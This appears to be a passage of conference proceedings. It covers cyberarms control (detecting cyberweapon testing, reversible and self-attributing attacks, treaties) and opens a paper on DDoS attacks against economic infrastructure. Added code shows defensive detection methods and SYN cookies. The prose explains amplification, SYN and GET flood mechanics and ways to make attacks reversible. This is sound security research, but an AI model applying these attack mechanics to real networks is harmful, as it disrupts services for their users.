These features mean that there will be clues to cyberweapons use in the nature of the targets, the sophistication and effectiveness of the attack, and the ability to attribute them. We can use conventional network monitoring to detect significant attacks; for instance, the denial of service in the Georgia attacks was easy to recognize. This does require a sufficiently broad deployment of network-traffic vantage points, secured both physically and virtually from tampering. One approach to deploying them is to have the vantage points be entirely passive and communicate over separate infrastructure via encrypted and authenticated channels. Centralization is an issue in the monitoring; the United Nations would probably want a centralized approach if they are to monitor. Ideally, a vantage point should exist at the ingress to each important network of a country, capable of full-rate traffic processing. If this is difficult, random<br />
sampling of traffic can be done. The monitoring infrastructure could be realized via government mandate or as part of efforts to enable wiretap compliance.<br />
Whereas the targeting of a criminal attack is often widespread and indiscriminate to obtain maximum victimization rates and profit to the criminal (although there are exceptions for some sophisticated financial scams), cyberweapons are likely to be much more focused. A cyberweapon might attack a particular country, a type of service (e.g. electrical grid or water systems), or systems used by a certain political, ethnic or religious persuasion. Both the Georgia and Stuxnet attacks employed moderately focused targeting (insufficiently focused according to critics). However, potential vulnerabilities and attack vectors will not correlate much with targets and there must be significant testing. This complicates the job of the attacker and requires additional tools beyond those used in purely criminal endeavors. We can use this difference to our advantage in detecting cyberweapons development. Cyberweapons by their nature are complex pieces of software that include components for penetrating remote systems, controlling the remote systems, and propagating to other systems. Understanding the behavior of a cyberweapon in isolation, or in simulated environments, is difficult – the more secret the testing, the less like the real world it will be, and the less accurate it will be at predicting real-world performance. We can see this demonstrated in the poor initial performance of complex new conventional weapons systems such as aircraft. We expect that countries wishing to employ cyberweapons will first unobtrusively try them against real targets to understand their real-world efficacy. An example is the attacks on Estonia in 2007 prior to the attacks on Georgia in 2008. The breadth of the initial testing provides a clue to forthcoming cyberweapons use.<br />
Thus, detecting pre-hostility events at the network level is possible. It can be aided by metrics for detecting national or political bias in the targets of malicious network traffic. Standard statistical techniques can suggest that the victims represent a particular political perspective or country's interest more than a random sample would (Rowe and Goh 2007). For instance, a significance test on a linear metric encoding political or social agendas can provide a first approximation, while the Kullback-Leibler divergence can characterize the extent of difference between expected and observed traffic distributions.<br />
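To make the two statistics above concrete, here is example code added for this page (not from Rowe and Goh 2007 or from any monitoring tool): a one-sided z-test on a linear agenda score, and a smoothed Kullback-Leibler divergence between a baseline victim distribution and the victims seen in one monitoring window. The victim categories, the baseline shares, the agenda scores and both sample windows are constructed.

```python
import math
from collections import Counter

# Constructed baseline: expected share of victims by category under indiscriminate
# (criminal) targeting. Categories ending in "_A" serve country A's interests.
BASELINE_SHARE = {
    "gov_A": 0.05, "bank_A": 0.10, "media_A": 0.05,
    "gov_B": 0.05, "bank_B": 0.10, "media_B": 0.05,
    "retail_other": 0.40, "home_users": 0.20,
}

# Linear metric encoding one hypothetical agenda: 1 if the victim serves country A, else 0.
AGENDA_SCORE = {cat: (1.0 if cat.endswith("_A") else 0.0) for cat in BASELINE_SHARE}

# Two constructed monitoring windows: the victim category of each malicious connection seen.
WINDOW_BIASED = (["gov_A"] * 40 + ["bank_A"] * 35 + ["media_A"] * 20 + ["gov_B"] * 3
                 + ["bank_B"] * 5 + ["retail_other"] * 30 + ["home_users"] * 17)
WINDOW_CONTROL = [cat for cat, share in BASELINE_SHARE.items()
                  for _ in range(round(share * 200))]


def agenda_z_test(window, baseline, score):
    """One-sided z-test: is the mean agenda score of observed victims higher than the
    mean a random sample drawn from the baseline would give? Returns (z, p_value)."""
    n = len(window)
    mu = sum(baseline[c] * score[c] for c in baseline)
    var = sum(baseline[c] * score[c] ** 2 for c in baseline) - mu ** 2
    if n == 0 or var <= 0.0:
        return 0.0, 1.0  # no evidence either way
    observed_mean = sum(score[c] for c in window) / n
    z = (observed_mean - mu) / math.sqrt(var / n)
    p_value = 0.5 * math.erfc(z / math.sqrt(2.0))
    return z, p_value


def kl_divergence(window, baseline, pseudocount=0.5):
    """D(observed || baseline) in nats, with additive smoothing so a category that is
    absent from the window does not produce log(0)."""
    counts = Counter(window)
    n = len(window)
    k = len(baseline)
    total = 0.0
    for cat, q in baseline.items():
        p = (counts.get(cat, 0) + pseudocount) / (n + pseudocount * k)
        total += p * math.log(p / q)
    return total


def assess_targeting_bias(window, baseline=BASELINE_SHARE, score=AGENDA_SCORE,
                          alpha=0.01, kl_threshold=0.1):
    """Combine both tests: flag a window when the agenda score is significantly elevated
    AND the whole victim distribution has drifted away from the baseline."""
    z, p_value = agenda_z_test(window, baseline, score)
    kl = kl_divergence(window, baseline)
    return {"n": len(window), "z": z, "p_value": p_value, "kl": kl,
            "biased": p_value < alpha and kl > kl_threshold}


if __name__ == "__main__":
    for name, window in (("biased", WINDOW_BIASED), ("control", WINDOW_CONTROL)):
        print(name, assess_targeting_bias(window))
```

The thresholds alpha and kl_threshold are tuning choices; a real deployment would calibrate them on windows known to be free of state-sponsored activity.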
How do we identify the political or social agenda to search for? This requires help from experts on international relations. Nations have longstanding grievances with other nations, and particular issues are more sensitive in some nations than others. We can enumerate many of them and identify associated Internet sites.<br />
We expect other properties of the observable network traffic to provide precursors to attack. Feature selection methods for finding discriminating network traffic features (Beverly and Sollins 2008) provide a start. Network-flow data may be sufficient for early warnings (Munz and Carle 2007). It will work well in tracking and analyzing attacks supported by hacker groups, such as the Chinese hacker groups (Hvistendahl 2010) that are harnessed to attack Western organizations at times of political or social grievances against them. We also can look for particular sequences of events indicative of a systematic attack, say a broadcast of many footprinting packets followed by more specific footprinting, something not seen much in criminal cyberattacks.<br />
An additional tool useful in detecting cyberweapons development is a decoy, a site deliberately designed to encourage attacks. A decoy can be designed to be more useful than a normal site by narrowing its content to just that necessary to invoke a response. A decoy can also be equipped with more detailed monitoring of its usage than would be possible for most sites, and should use honeypot technology to implement attack resilience and intelligence-gathering capabilities that are not easily disabled. Decoys do not generally raise ethical concerns because they are passive, but guidelines should be followed in their use (Rowe 2010 JTE) since decoys are used by phishers.<br />
Data fusion on World Wide Web usage can complement our network monitoring. If a country's government shows a sudden increase in visits to hacker Web sites, it may suggest cyberweapons development.<br />
3.3 Encouraging more-responsible cyberattacks<br />
International agreements can stipulate the manner in which cyberwarfare can be conducted. Two important aspects of this are attribution and reversibility of attacks. For attribution, a responsible country will find it in its interests to make its attacks clear in origin to better enable the desired political and social effects of an attack, which are often more important than the actual military value. The ability to trace the Georgia cyberattacks back to Russia without too much trouble suggests such a political effect was<br />
intended. Contrarily, it could be useful to a country to be able to prove it was not the source of a cyberattack for which it is being blamed. Attribution can be done by digital signatures attached to attack code or data that identify who is responsible for an attack and why. They could be concealed steganographically (Wayner 2002) to avoid providing a clue to the victim that they are being attacked. For attacks without code like denial of service, a signature can be encoded in the low-order bits of the times of the attacks.<br />
Nations should also be encouraged to use attack methods that are more easily repairable, following the same logic behind the design of easily removable landmines. Rowe (2010 ECIW) proposed four techniques that can be used to make cyberattacks easier to reverse by the attacker than by the victim, even when the victim tries to restore from backup (Dorf and Johnson 2007). They are: (1) encryption of key software and data by the attacker where the victim does not have the key to decrypt it; (2) obfuscation of a victim's system by the attacker by data manipulations that are hard to understand yet algorithmic and reversible; (3) withholding by the attacker of key information that is important to the victim; and (4) deception by the attacker of the victim to make them think their systems are not operational when they actually are. In the first two cases, reversal can be achieved by software operations by the attacker; in the third case, the attacker can restore missing data; and in the fourth case, the attacker can reveal the deception.<br />
How do we encourage attackers to use reversible attacks? There are several incentives. One would be if the attacker will eventually need to pay reparations, as the United Nations could stipulate as part of a negotiated settlement of a conflict (Torpey 2006). Even in an invasion or regime change, it is likely that the impacts of cyberweapons will need to be mitigated—indeed, the perceived possibility of mitigation will likely drive the adoption of cyberweapons. Another incentive comes from international outcry at using unethical methods and the resulting ostracism of the offending state, as with the use of biological weapons. Another incentive is if a victim is likely to respond in like kind, wherein use of a reversible attack could encourage an adversary to do the same because otherwise they would appear to be escalating the conflict (Gardam 2004). Also, nonreversible attacks could be interpreted as violating the laws of warfare in regard to unjustified force when reversible methods are easily available. Responses of the international community to analogous violations include sanctions, boycotts, fines, and legal proceedings (Berman 2002).<br />
3.4 Support for international cooperation<br />
Global cybersecurity is hindered by a lack of cybersecurity action plans at the national level (Ghernouti-Helie 2010). Reducing vulnerabilities and threats from cyber attack requires the policy community to support norms of behavior among states, enforceable at the national level, to secure the "cyber commons". The 2010 U.S. Quadrennial Defense Review advocates strengthening international partnerships to secure the cyber domain using technical, legal and organizational cooperation, and a recent U.S. GAO report (USGAO 2010) recommended that the U.S. "establish a coordinated approach for the federal government in conducting international outreach to address cybersecurity issues strategically."<br />
Several international agreements dealing with cybercrime can serve as models for cyberarms control. The Council of Europe Convention on Cybercrime, adopted in November 2001, seeks to align domestic substantive and procedural laws for evidence gathering and prosecution, and to increase international collaboration and to improve investigative capabilities for coordinating E.U. efforts on cyber crimes. Adopted and ratified by the US in 2007, it is considered a model law for the rest of the world. The World Summit on the Information Society Declaration of Principles endorsed a global culture of cybersecurity that is promoted, developed, and implemented in cooperation with all stakeholders and international expert bodies. The International Telecommunications Union (ITU) and U.N. General Assembly have also passed several resolutions addressing the criminal misuse of information. The efforts of the ITU have culminated in the International Multilateral Partnership against Cyber Threats (IMPACT), although the United States does not currently support it. IMPACT is a Global Response Centre based in Cyberjaya, Malaysia. It was set up in 2009 to serve as the international community's main cyberthreat resource by proactively tracking and defending against cyberthreats. The center's alert and response capabilities include an Early Warning System that enables IMPACT members to identify and head off potential and imminent attacks before they can inflict damage on national networks.<br />
Many of the ideas mentioned here benefit from international cooperation (Yannakogeorgos 2010; Yannakogeorgos 2011). An example is sharing of data collected from monitoring of the Internet<br />
(Erbschloe 2001). Data on just source address, destination address, and packet size is not very sensitive or subject to privacy concerns, and should be useful to share even when traffic is encrypted. The European Convention on Cybercrime makes a step in that direction. So that appears to be a good initial focus for international agreements on sharing of data, and not just for cyberweapons tracking.<br />
Other agreements could focus on mandating technology that will aid in managing a cyberweapons threat. An example would be a mandate for countries to use IPv6 instead of IPv4 to enable better attribution of events on the Internet; rogue states could be told that they cannot connect to the Internet unless they use IPv6. Other mandates could stipulate architectures in which attribution of traffic is easier, such as minimum requirements on persistence of cached records. Other useful agreements could prohibit less-controllable attacks such as worms and mutating viruses, to achieve better discrimination of military from civilian targets in cyberattacks (Shulman 1999).<br />
Criminal prosecution of a nation's hacker groups by its government could be an important stipulation of agreements. For instance, when Philippine hackers in 2000 launched a virus that attacked computers worldwide and the Philippine government was initially unhelpful, improvements under international pressure were subsequently made by it, both legally and managerially, to enable a better response in the future. Other possible agreements could follow those of traditional arms control, as for instance a commitment to use cyberweapons only in self-defense, or agreed export controls on cyberweapons technology. We do need to make legal distinctions between cybercrime, cyberconflict, cyberespionage and cyberterror, as this is necessary when creating a regulatory regime for cyberweapons (Wingfield 2009). One model that could be studied is the Wassenaar Arrangement for export controls, which could be extended to information technology products.<br />
4. Conclusion<br />
Cyberarms agreements have been said to be impossible. But technology is changing that. We can seize and analyze drives on which cyberweapons were developed; we can detect the necessary testing of cyberweapons; we can create incentives for self-attributing and reversible cyberattacks; and we can develop and ratify new kinds of international agreements. While we cannot stop cyberweapons development, we may be able to control its more dangerous aspects much as we control chemical, biological, and nuclear weapons, and limit it to responsible states. It is time to consider seriously the possibility of cyberarms control.<br />
The views expressed are those of the author and do not represent those of any part of the U.S. Government.<br />
References<br />
Berman, P. (2002) "The Globalization of Jurisdiction," University of Pennsylvania Law Review, Vol. 151, No. 2, pp. 311-545.<br />
Beverly, R., and Sollins, K. (2008) "An Internet Protocol Address Clustering Algorithm," USENIX SysML Workshop.<br />
Brenner, S. (2010) Cybercrime: Criminal Threats from Cyberspace, Santa Barbara, CA, US: Praeger.<br />
Clarke, R., and Knake, R. (2010) Cyberwar: The Next Threat to National Security and What To Do about It, New York, US: HarperCollins.<br />
Croft, S. (1996) Strategies of Arms Control: A History and Typology, Manchester, UK: Manchester University Press.<br />
Dorf, J., and Johnson, M. (2007) "Restoration Component of Business Continuity Planning," in Tipton, H., and Krause, M. (Eds.), Information Security Management Handbook, Sixth Edition, Boca Raton, FL, US: CRC Press, pp. 1645-1654.<br />
Erbschloe, R. (2001) Information Warfare: How to Survive Cyber Attacks, Berkeley, CA, US: Osborne/McGraw-Hill.<br />
Gady, F.-S. (2010, March 24) "Africa's Cyber WMD," Foreign Policy.<br />
Gardam, J. (2004) Necessity, Proportionality, and the Use of Force by States, Cambridge, UK: Cambridge University Press.<br />
Garfinkel, S. (2006, September) "Forensic Feature Extraction and Cross-Drive Analysis," Digital Investigation, Vol. 3, Supplement 1, pp. 71-81.<br />
Garfinkel, S., Roussev, V., Nelson, A., and White, D. (2010) "Using Purpose-Built Functions and Block Hashes to Enable Small Block and Sub-File Forensics," DFRWS, Portland, OR.<br />
Ghernouti-Helie, S. (2010) A National Strategy for an Effective Cybersecurity Approach and Culture, New York, US: IEEE Press.<br />
Hvistendahl, M. (2010, March 3) "China's Hacker Army," Foreign Policy.<br />
Johnson, P. (2002) "Is It Time for a Treaty on Information Warfare?" in Schmitt, M., and O'Donnell, B., Computer Network Attack and International Law (International Law Studies Volume 76), pp. 439-455, Newport, RI, US: Naval War College.<br />
Libicki, M. (2007) Conquest in Cyberspace: National Security and Information Warfare, New York, US: Cambridge University Press.<br />
Malin, C., Casey, E., and Aquilina, J. (2008) Malware Forensics: Investigating and Analyzing Malicious Code, Syngress.<br />
Markoff, J. (2010, September 26) "A Silent Attack, But Not a Subtle One," New York Times, p. A6.<br />
Mel, H., and Baker, D. (2000) Cryptography Decrypted, 5th edition, Boston, MA, US: Addison-Wesley Professional.<br />
Munz, G., and Carle, G. (2007, May) "Real-Time Analysis of Flow Data for Network Attack Detection," Proc. 10th IFIP/IEEE Intl. Symposium on Integrated Network Management, pp. 100-108.<br />
O'Neill, P. (2010) Verification in an Age of Insecurity: The Future of Arms Control Compliance, New York, US: Oxford.<br />
Price, R. (1997) The Chemical Weapons Taboo, Ithaca, NY, US: Cornell University Press.<br />
Rooney, B. (2011, February 4) "Calls for Geneva Convention in Cyberspace," Wall Street Journal.<br />
Rowe, N. (2010) "The Ethics of Cyberweapons in Warfare," Journal of Technoethics, Vol. 1, No. 1, pp. 20-31 [JTE].<br />
Rowe, N. (2010, July) "Towards Reversible Cyberattacks," Proc. 9th European Conference on Information Warfare and Security, Thessaloniki, Greece [ECIW].<br />
Rowe, N., and Garfinkel, S. (2010, May) "Global Analysis of Disk File Times," Fifth International Workshop on Systematic Approaches to Digital Forensic Engineering, Oakland, CA.<br />
Rowe, N., and Goh, H. (2007, June) "Thwarting Cyber-Attack Reconnaissance with Inconsistency and Deception," 8th IEEE Information Assurance Workshop, West Point, NY, pp. 151-158.<br />
Shulman, M. (1999) "Discrimination in the Laws of Information Warfare," Columbia Journal of Transnational Law, Vol. 37, pp. 939-968.<br />
Torpey, J. (2006) Making Whole What Has Been Smashed: On Reparations Politics, Cambridge, MA, US: Harvard University Press.<br />
Trost, R. (2010) Practical Intrusion Analysis, Upper Saddle River, NJ, US: Addison-Wesley.<br />
United Nations (1991) Final Document: Third Review Conference of the Parties to the Convention on the Prohibition of the Development, Production, and Stockpiling of Bacteriological (Biological) and Toxin Weapons and on Their Destruction, BWC/DONF.II/23, Geneva, Switzerland.<br />
USCCU (United States Cyber Consequences Unit) (2009, August) "Overview by the US-CCU of the Cyber Campaign against Georgia in August of 2008," US-CCU Special Report, downloaded from www.usccu.org.<br />
USGAO (United States Government Accountability Office) (2010, March 5) "Cybersecurity: Progress Made But Challenges Remain in Defining and Coordinating the Comprehensive National Initiative," Washington, D.C., US: Government Accountability Office.<br />
Wayner, P. (2002) Disappearing Cryptography: Information Hiding: Steganography and Watermarking, San Francisco, CA, US: Morgan Kaufmann.<br />
Wingfield, T. (2009) "International Law and Information Operations," in Kramer, F., Starr, S., and Wentz, L. (Eds.), Cyberpower and National Security, Washington, DC, US: National Defense University Press, pp. 525-542.<br />
Yannakogeorgos, P. (2010, October) "Cyberspace, The New Frontier - And the Same Old Multilateralism," in Reich, S., Global Norms, American Sponsorship and the Emerging Patterns of World Politics, Houndsmills, UK: Palgrave.<br />
Yannakogeorgos, P. (2011) "Promises and Pitfalls of the U.S. National Strategy to Secure Cyberspace," Carlisle, PA, US: Army War College.<br />
Distributed Denial of Service Attacks as Threat Vectors to<br />
Economic Infrastructure: Motives, Estimated Losses and<br />
Defense Against the HTTP/1.1 GET and SYN Floods<br />
Nightmares<br />
Libor Sarga and Roman Jašek<br />
Tomas Bata University in Zlin, Czech Republic<br />
sarga@fame.utb.cz<br />
jasek@fai.utb.cz<br />
Abstract: With the number of nodes in the Internet's backbone networks rising exponentially, the possibility of the emergence of entities exhibiting outwardly hostile intents has been steadily increasing. Cyberspace is fittingly termed "the no man's land" because of its unprecedented growth pattern and lackluster control mechanisms. Distributed Denial of Service (DDoS) attacks take advantage of this situation and primarily aim at destabilizing or severely limiting the usability of infrastructure to end-users, in part or in whole. A typical DDoS incursion exploiting a heterogeneous base of personal computers consists of two phases: insertion of a predefined set of instructions into the host systems via either self-propagating or non-reproducing malware, and simultaneous execution of repeated queries against a destination unit. Generally targeted and deployed to impede the functionality of a single server or of multiple servers with similar properties, utilizing substantial resources with little to no discernible selection criteria, DDoSes pose a significant threat. Moreover, effective and efficient countermeasures require experience, precision, speed, operational awareness, appropriate security protocols summarizing and alleviating potential consequences in case containment fails, as well as proactive detection algorithms in place. Global response instruments (batch filtering, temporary IP address blacklisting) are only suitable for SYN floods, whereas during a GET DDoS the same tools cannot be used because legitimate incoming requests are present. The article scrutinizes methodology and policies currently in effect as part of Critical Infrastructure Protection initiatives. The examination makes it possible to outline procedural decision-making trees for the event of a DDoS violation while maintaining a predefined and consistent quality of service level. Furthermore, the rationale of perpetrators' motives for instigating the attacks is hypothesized, with preferential focus on economic infrastructure components. These hubs of the virtualized economy are detailed, and target selection probabilities from tactical and strategic perspectives are identified based on known facts. Financial losses, worst case scenarios and social repercussions following a successful intrusion are also investigated by means of inference from successful DDoS insurgences.
Keywords: distributed denial of service, economic infrastructure, potential losses, distributed attacks, network security, economic hubs, business continuity assurance, attack vectors analysis, botnet recruitment
1. Introduction
A DoS is a network-based incursion during which an agent intentionally saturates system resources by means of increased network traffic, consuming capacity otherwise utilized to handle legitimate inquiries (Carl et al 2006). DDoS differs in that it uses many hijacked systems in a hierarchical structure controlled by a single attacker (master) and represents a coordinated effort aimed at destabilizing infrastructure elements (Garber 2000). Here, victim-side ingress packet flow consists of both genuine and spoofed requests. A scheme of the attack is depicted below (Figure 1).
Non-existent nomenclature initially prompted some authors (Elliott 2000) to label the infected stations "ants", "zombies", "slaves" (Nagesh & Sekaran) or "drones" (Holz 2005), but the term "bots" is the most widely used. Despite the known modus operandi (CERT 1997), recent cases proved that effective and efficient countermeasures are still yet to emerge.
The rest of the article is divided as follows: in the second part we describe various types of DDoS attacks and defense mechanisms to maintain a predefined Quality of Service (QoS) level. In the third part we propose a decision-making tree formalizing the steps to undertake in order to withstand the incoming data flows while simultaneously keeping (if possible) the affected unit fully operational and minimally affected. The final part delimits significant economic centers, their estimated potential for handling incoming requests, and also details perpetrators' motives in correlation with the broader socio-economic environment.
Figure 1: Scheme of a DDoS attack (Mirkovic et al 2004)
2. DDoS Attacks: Threat or annoyance?
"DoS attack: [Usenet, common; note that it's unrelated to DOS as name of an operating system] Abbreviation for Denial-Of-Service attack. This abbreviation is most often used of attempts to shut down newsgroups with floods of spam, or to flood network links with large amounts of traffic, often by abusing network broadcast addresses." (Raymond 2004)
While there may have been a perception shift in relation to the Anonymous initiative attacks (commercial or national cyberspace incidents presently form the primary threat space of DoS), its definition still provides a sound basis for analysis.
A DoS attack utilizes only a single machine to distribute the payload. If no sophisticated obfuscation or spoofing mechanism is used to hide the attacker's IP address, the source is easily detectable. The method's usability hence quickly dissipated in favor of DDoS.
However, even for a single machine operating on a fixed bandwidth it is possible to amplify outgoing traffic by manipulating Domain Name System Security Extensions (DNSSEC), which emerged as a reaction to the lacking security (possibility of poisoning) of the original DNS used for domain name to IP address translation. When an attacker sends a spoofed reply to its own query by forging or guessing a 16 bit (65,535 values) pseudorandom string and the malformed data are cached and stored for further reference, the DNS is said to have been poisoned. This may be countered by sending an additional request for the same DNS Resource Record (Trostle 2010) or by transferring to DNSSEC. Despite the latter's advantages it also exhibits the property of incoming UDP traffic amplification. During an experimental US to Europe transfer the output was boosted 51 times in proportion to input (Bernstein 2010). Sending 10 Mbps can trigger 500 Mbps of traffic, and 200 Mbps results in a 10 Gbps flood.
2.1 Dissecting a DDoS…
There are several patterns associated with DDoS, each of which exploits different standardized behavior of the target server based on known communication protocol routines.
2.1.1 Smurf / ICMP
The perpetrator floods the network with ping response messages from a wide array of sites by redirecting packets to the target (IBM 2000), often amplifying the attack by sending larger packets (Zargar & Kabiri 2009) or using broadcast domains in the process. If a domain with 65,356 stations is used, a 56 kbps dialup modem could generate a maximum bandwidth of 3.66 Gbps (Kumar 2007).
ICMP attacks follow the same vector save for the amplification, making them less effective compared to Smurf attacks.
Both types require misconfigured routers and the assistance of mutually independent stations.
2.1.2 TCP SYN / UDP
The procedure for establishing a connection between two parties using a HTTP protocol is called a three way handshake (Postel 1981). DDoS modifies the sequence by not sending the final packet after receiving confirmation from the server that it is ready for the connection, leaving an unused open slot (Eddy 2007).
A SYN flood aims at depleting resources via unfinished, half-open requests. The server capacity being limited, it is possible for the effort to be successful if enough bots are simultaneously employed. After the discovery, description (Bennahum 1994) and subsequent abuse, the Computer Emergency Response Team (CERT) released its first advisory on the matter (CERT 1996).
The UDP version utilizes UDP instead of TCP packets, which don't require a three way handshake to initiate a session, instead sending a high volume of packets to the target's random ports (IANA 2010).
2.1.3 HTTP GET
The HTTP GET extends TCP SYN. The connection is finalized and established, with the request passed on as legitimate (MacVittie 2008). The attacker now has access to low-level functions, such as the GET command used to "retrieve whatever information (in the form of an entity) is identified by the Request-URI" (Fielding et al 1999). A large number of entities is thus requested, slowing down the server.
2.1.4 Common patterns
The probability of the incursion's success scales according to the number of machines used as mediators, and whether additional factors, speed of the attack and automation in particular, are introduced (Householder 2002). Apart from Smurf and ICMP attacks, which don't require hijacked arrays of stations, all other types use them. Such an array is called a botnet and usually forms clusters with whole subnets infected by a suitable propagation carrier like malware.
Attacks exploit standardized network behavior and response mechanisms. Instigators are aware that broader deployment of changes to the existing protocols and infrastructure is a long-term process requiring broad consensus and considerable resources. This assures the strategic continuity of their operations.
Fundamental properties, features and patterns remain largely unchanged over time, with the only variables being network utilization, number of controlled nodes and target selection. As the incursions need to abide by the same protocols they exploit, new forms of DDoS may emerge only within their confines. Recently, the CXPST attack (Coordinated Cross Plane Session Termination) was proposed, which cripples routers from making proper packet switching decisions (Schuchard et al. 2011).
2.2 And how to defend against it
DoS attacks have since their discovery been documented and comprehensively treated (Mirkovic et al 2004), albeit security measures are still falling short. If the attacker has sufficient resources at their disposal, the probability that the victim's site will be forced to go offline is substantial. Coordinated efforts to contain DDoS have begun to materialize only recently as a threat response.
One of the initiatives is honeypots, which redirect incoming threats into an environment isolated from the rest of the network where they may be analyzed for information that identifies the attacker and shows how to defend against and defeat the intruder when their identity isn't known and no a priori knowledge is available about how they operate or their motives (Artail 2006). A disadvantage is that if the perpetrator realizes the code is contained within a honeypot, they leave immediately and choose a different approach vector (Raynal et al 2004). An arrangement addressing the issue was devised which uses multiple randomly chosen servers to act as roaming honeypots, making detection more difficult (Khattab et al 2003). The solution makes it possible to study malware propagation patterns, which may hamper the formation of botnets, thus lowering the risk of a DDoS.
It is possible to stop Smurf / ICMP attacks by configuring routers to deny forwarding of directed broadcast packets (IBM 2000), a functionality seldom used outside the scope of exploiting. On the victim side, the solution is to either contact an ISP for temporary traffic blocking or notify the owners of the amplifying machines (CERT 1998).
TCP SYN / UDP attacks directly interact with the victim's network and initiate a hostage situation where "innocent" requests may be caught in the "crossfire". One proposed solution is to use SYN cookies (Bernstein & Schenk 1996), which associate a random string with every attempted connection. When the modified handshake packet containing a spoofed or otherwise obfuscated IP address returns and doesn't match the sequence, it is discarded. The concept hasn't yet been widely implemented.
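As an added illustration of the SYN cookie idea referenced above (example code written for this edition, not the authors' or Bernstein & Schenk's implementation; the 32-bit field layout, the MSS table, the secret and the counter values are this example's own assumptions), the following Python sketch shows why the server needs no half-open state: the information it would otherwise store is folded into the SYN-ACK's sequence number and recovered from the returning ACK, and an ACK for a spoofed source, which never saw the SYN-ACK, fails verification and is dropped without allocating anything.

```python
"""SYN cookies in the spirit of Bernstein & Schenk (1996): the server keeps
no half-open connection state. Added example; layout and constants are
this example's own choices, not a transcription of any real TCP stack."""
import hashlib
import hmac
import socket
import struct

# Constructed per-server secret; a real implementation rotates it periodically.
SECRET = b"example-syn-cookie-secret"

# MSS values the cookie can encode in 3 bits (index into this table).
MSS_TABLE = (536, 1220, 1440, 1460)

# Cookie layout (32 bits): 5-bit counter | 3-bit MSS index | 24-bit MAC.
ACCEPT_WINDOW = 2  # cookies from the current and previous counter tick are valid


def _mac24(saddr, sport, daddr, dport, counter, secret=SECRET):
    """24-bit keyed hash binding the cookie to the 4-tuple and the counter."""
    msg = (socket.inet_aton(saddr) + struct.pack("!H", sport)
           + socket.inet_aton(daddr) + struct.pack("!H", dport)
           + struct.pack("!I", counter))
    digest = hmac.new(secret, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def make_cookie(saddr, sport, daddr, dport, client_mss, counter):
    """Initial sequence number for the SYN-ACK; it encodes what the server
    would otherwise have to remember about the half-open connection."""
    fitting = [i for i, mss in enumerate(MSS_TABLE) if mss <= client_mss]
    idx = max(fitting) if fitting else 0
    return (((counter & 0x1F) << 27)
            | (idx << 24)
            | _mac24(saddr, sport, daddr, dport, counter)) & 0xFFFFFFFF


def check_cookie(saddr, sport, daddr, dport, ack, counter):
    """Verify the third handshake packet. Returns the negotiated MSS if ack-1
    is a cookie issued for this 4-tuple within ACCEPT_WINDOW ticks, else None
    (the segment is dropped and no connection state is allocated)."""
    cookie = (ack - 1) & 0xFFFFFFFF
    counter_low = cookie >> 27
    idx = (cookie >> 24) & 0x7
    mac = cookie & 0xFFFFFF
    for age in range(ACCEPT_WINDOW):
        c = counter - age
        if c < 0 or (c & 0x1F) != counter_low:
            continue
        expected = _mac24(saddr, sport, daddr, dport, c)
        if hmac.compare_digest(mac.to_bytes(3, "big"), expected.to_bytes(3, "big")):
            return MSS_TABLE[idx]
    return None


def demo():
    """Three constructed handshakes against a server at 203.0.113.1:80."""
    now = 1000  # constructed counter value (e.g. minutes since boot)
    srv = ("203.0.113.1", 80)
    # A genuine client echoes cookie+1 in its ACK: accepted, MSS recovered.
    isn = make_cookie("198.51.100.7", 40000, *srv, 1460, now)
    genuine = check_cookie("198.51.100.7", 40000, *srv, isn + 1, now)
    # A SYN with a spoofed source never sees the SYN-ACK, so any ACK arriving
    # for that 4-tuple carries an unrelated number: rejected, nothing stored.
    forged = check_cookie("198.51.100.7", 40000, *srv, 0x12345678, now)
    # The same cookie replayed several ticks later is also rejected.
    stale = check_cookie("198.51.100.7", 40000, *srv, isn + 1, now + 5)
    return genuine, forged, stale


if __name__ == "__main__":
    print(demo())  # (1460, None, None)
```

The counter comes from a coarse clock and the secret is rotated, so a cookie stays valid only for a bounded time. The price of keeping no state is that TCP options the cookie does not encode are lost for that connection, which is why real stacks typically switch cookies on only when the SYN backlog is under pressure.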
HTTP GET remains the most difficult to properly address. The ultimate purpose of the connection becomes apparent only after GET requests have been made, and therefore it has to be initially handled as a genuine one. In this case administrators can't globally batch filter or blacklist any IP address, as this may thwart intended functionality for "hostage" requests. One solution is to migrate to a parallel computing environment such as the cloud, defined as "a large pool of easily usable and accessible virtualized resources [which]… can be dynamically reconfigured to adjust to a variable load (scale), allowing also for an optimum resource utilization" (Vaquero 2009). Security in such shared space is currently a matter of concern and research; the resources for handling an elevated number of requests may guarantee the continuity of the target's on-line business operations, though. Cloud architecture doesn't in any way mitigate DDoS but instead adds more resources to the victim's infrastructure capabilities. As the attack may last uninterrupted for several hours or days, lease costs and other expenses have to be factored in. Despite the cloud itself being vulnerable to DDoS (Bakshi & Yogesh 2010), its scalability ensures the attacker has to control a comparatively larger botnet than they would in the case of attempts at a single server.
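An added example (not from the paper) of how the GET flood described above can be separated from the legitimate requests that, as the text notes, cannot simply be blacklisted away: since every request is individually well-formed, the only usable signal is aggregate behaviour per source, here a sliding-window request count over Apache-style access log lines. The log contents, addresses and thresholds are constructed for the example.

```python
"""Per-source request-rate detection over web server access logs.
Added example, not the paper's code. The log lines are constructed
(Apache combined-log style) and the thresholds are this example's own."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, request) or None for a line that doesn't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["req"]


def find_floods(lines, window_s=10, max_requests=20):
    """Sliding-window request count per source IP. Returns {ip: peak number of
    requests seen within any window_s seconds} for every source whose peak
    exceeded max_requests. Lines are expected in chronological order per source;
    unparseable lines are skipped."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)   # ip -> timestamps inside the current window
    peak = defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, _ = parsed
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # evict requests older than the window
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n > max_requests}


def _log_line(ip, ts, req="GET /index.html HTTP/1.1"):
    """Format one constructed combined-log line."""
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "{req}" 200 5120'


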